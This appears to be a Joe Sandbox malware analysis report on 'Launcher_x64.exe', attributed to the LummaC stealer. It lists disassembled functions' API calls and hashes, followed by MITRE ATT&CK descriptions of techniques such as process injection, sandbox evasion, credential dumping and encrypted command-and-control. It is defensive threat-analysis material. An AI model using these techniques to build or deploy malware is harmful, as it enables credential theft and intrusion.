LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D7F74C,00000000,?,00D91E20,?,?,?,00D7F683,00000004,InitializeCriticalSectionEx,00D890D4,00D890DC), ref: 00D7F6BD
GetLastError.KERNEL32(?,00D7F74C,00000000,?,00D91E20,?,?,?,00D7F683,00000004,InitializeCriticalSectionEx,00D890D4,00D890DC,00000000,?,00D7539C), ref: 00D7F6C7
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D7F6EF

Strings

api-ms-, xrefs: 00D7F6D4

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 4b6b66efdaef552814493662018621db916e351e4a95182b50e4c1508b8ff498
Instruction ID: 9649057d55f4aa738aeba20f2f7053ce65688110d35b410fc931d5824f72fe93
Opcode Fuzzy Hash: 4b6b66efdaef552814493662018621db916e351e4a95182b50e4c1508b8ff498
Instruction Fuzzy Hash: 27E01230250305BAEB312B61EC0AB5C3B949B00B51F244430F90CE81A0FBA299509EB5

Function 00D7D74E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00D7D7B1

Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D7DA03
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D7DA49
GetLastError.KERNEL32 ref: 00D7DAEC

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 31c7f4c0adcb32c62f68f583b6b5b81c58c002ca9f1d1de5e0a465e81d617471
Instruction ID: 6b0872a12a3c1cfdac55e332845d70aeb28ba51a8759c91ad726652ece449012
Opcode Fuzzy Hash: 31c7f4c0adcb32c62f68f583b6b5b81c58c002ca9f1d1de5e0a465e81d617471
Instruction Fuzzy Hash: F9D16B75D042589FCF15CFA8C8809ADBBB6FF49314F28816AE45AEB351E730A941CB60

Function 00D74A73 Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00D74B3A
___AdjustPointer.LIBCMT ref: 00D74B5D
___AdjustPointer.LIBCMT ref: 00D74BF9

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 848afbc038789c983303edabf5c9d1e30fb8589e26ef94b0d315bef32108477d
Instruction ID: bfa667a247651479553afdf958c157f4aa9a4968cd26a6be25c50837e22a2b81
Opcode Fuzzy Hash: 848afbc038789c983303edabf5c9d1e30fb8589e26ef94b0d315bef32108477d
Instruction Fuzzy Hash: CA51E1726052069FDB2A9F14D881BBAB7A8EF00311F28852DE94D57291F731EC40CBB0

Function 00D7B576 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D7B5DA
__dosmaperr.LIBCMT ref: 00D7B5E1
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D7B61B
__dosmaperr.LIBCMT ref: 00D7B622

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 8eb4edbe76670798437dfbf930815999119a8a0f2cbb98fb73e2dabb95d2fb38
Instruction ID: d4b44ea25cc552eb20b3df6f088d9fcb9b0824aeefc29bb11e34a425429153d1
Opcode Fuzzy Hash: 8eb4edbe76670798437dfbf930815999119a8a0f2cbb98fb73e2dabb95d2fb38
Instruction Fuzzy Hash: 2A218B71600609AFDB20AF66C881AAFB7A9EF45374714C51AF95DDB650F731EC408BB0

Function 00D6CA12 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30bc071266a8cad1919b614ec4cdf2d44186c2b649272c0e64d176e2285040d
Instruction ID: a811b07d9530e115a03181b21f363b3c03ba9f0b37973264c242461864e21def
Opcode Fuzzy Hash: d30bc071266a8cad1919b614ec4cdf2d44186c2b649272c0e64d176e2285040d
Instruction Fuzzy Hash: 9C21C032220209AFDB21EFB5DC8197A77A8EF403687149619F899C7650F730EC40DBB0

Function 00D7C96E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00D7C976

Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7C9AE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7C9CE

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: efdfedf52bd4613d66a63f38b7bec25803f9a663167261b5747ed27ccc97e587
Instruction ID: e6265269a883aea9115264ad3c363539889014eab3446e5dbe2a423df1cd5f94
Opcode Fuzzy Hash: efdfedf52bd4613d66a63f38b7bec25803f9a663167261b5747ed27ccc97e587
Instruction Fuzzy Hash: 1D1126F29216097F6B1167766C8DC7F6AACDF843D53908018F90DD1200FB70CD008AB2

Function 00D84490 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000), ref: 00D844A7
GetLastError.KERNEL32(?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?,?,?,00D7D486,?), ref: 00D844B3

Part of subcall function 00D84510: CloseHandle.KERNEL32(FFFFFFFE,00D844C3,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?,?), ref: 00D84520

___initconout.LIBCMT ref: 00D844C3

Part of subcall function 00D844E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D84481,00D839CC,?,?,00D7DB40,?,00000000,00000000,?), ref: 00D844F8

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D839DF,00000000,00000001,?,?,?,00D7DB40,?,00000000,00000000,?), ref: 00D844D8

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 8a48b0bb40f6d25b78cd578845cde7adcf9e030f59df84cf40782a228af6da3a
Instruction ID: 255697b9578e0053e714db808193c1074dad779bc5115dae3d3d3dd2f230679c
Opcode Fuzzy Hash: 8a48b0bb40f6d25b78cd578845cde7adcf9e030f59df84cf40782a228af6da3a
Instruction Fuzzy Hash: A8F0303A011226BBCF223FD5EC09A8E3F26FB493B0B054450FA18C5230D67288209FB4

Function 00D6A335 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D6A347
GetCurrentThreadId.KERNEL32 ref: 00D6A356
GetCurrentProcessId.KERNEL32 ref: 00D6A35F
QueryPerformanceCounter.KERNEL32(?), ref: 00D6A36C

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: faf9d3ccbc6641f872816f5800288b781c42454cafc434d674908ef3bbe879db
Instruction ID: bbf00d3dda957a98ff7d7e86c21c8e63d493014f009d73c495d5503a4446a4c7
Opcode Fuzzy Hash: faf9d3ccbc6641f872816f5800288b781c42454cafc434d674908ef3bbe879db
Instruction Fuzzy Hash: 94F06774D1020DEBCB00EBB4D94999EBBF4FF1D204B514995E412E7210E730A7449F51

Function 00D7A126 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D6F809,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D7A1E5
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D6F809,?,?,?,00000055,?,-00000050,?,?), ref: 00D7A21C

Strings

utf8, xrefs: 00D7A2EE

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: a116b71e8fe4b5fff891a44014fb931d777c88096c36ffc4a42583c2ac4f491c
Instruction ID: 45e9dde6864d156daa931f39507cda29745fcfc84825e2ad5fb95e333a7672ee
Opcode Fuzzy Hash: a116b71e8fe4b5fff891a44014fb931d777c88096c36ffc4a42583c2ac4f491c
Instruction Fuzzy Hash: 0851D771600705AAE725AFB8CC42BBE73A8EF85711F58842AF94D97181F670ED408B77

Function 00D75170 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D75071,?,?,00000000,00000000,00000000,?), ref: 00D75195

Strings

RCC, xrefs: 00D751AF
MOC, xrefs: 00D751A7

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 0fec9516253b5116a0742f4f54cc233897fe926708235a6ae1ca10f8eec6740d
Instruction ID: b2b1ce5d5b8987740502310ad79eea20e904598d273e9f3bc3b8aa4d257547ae
Opcode Fuzzy Hash: 0fec9516253b5116a0742f4f54cc233897fe926708235a6ae1ca10f8eec6740d
Instruction Fuzzy Hash: DF41AC31900609EFCF15CF98DC81AEEBBB5FF08304F188199F90867216E3B1A950DB66

Function 00D749DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00D74C53

Strings

csm, xrefs: 00D74C75
csm, xrefs: 00D74CE6

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 829149afb84b4b40d40af062cf2d3c96ac86b07a01a29663beb594334454e875
Instruction ID: b1b73bbb8a89f5abeca551d8b4f9a146d04717acd18eae032022585d67f9b0e0
Opcode Fuzzy Hash: 829149afb84b4b40d40af062cf2d3c96ac86b07a01a29663beb594334454e875
Instruction Fuzzy Hash: 2531B032501218EBCF379F58C8459AA7B66FF09315B19C65AFC9C4A121E332CCA1DBB1

Function 00D61DB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00D61E6E

Strings

VirtualProtect, xrefs: 00D61E61
@, xrefs: 00D61EB7

Memory Dump Source

Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd

Similarity

API ID: AddressProc
String ID: @$VirtualProtect
API String ID: 190572456-29487290
Opcode ID: 3fd6a0ec314ff19c5aeb65eeb08b8845c8a38c7ed2ab61ad3e9edb41d613fcb1
Instruction ID: 6d1644b195d191c98dce675188c1a3f6ab76d7e3ff1b16903b4e9541f81cf72f
Opcode Fuzzy Hash: 3fd6a0ec314ff19c5aeb65eeb08b8845c8a38c7ed2ab61ad3e9edb41d613fcb1
Instruction Fuzzy Hash: 2F41D1B4905309DFDB04DFA9E99869EBBF0FF48318F10841AE858AB350D7759984CFA1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Launcher_x64.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

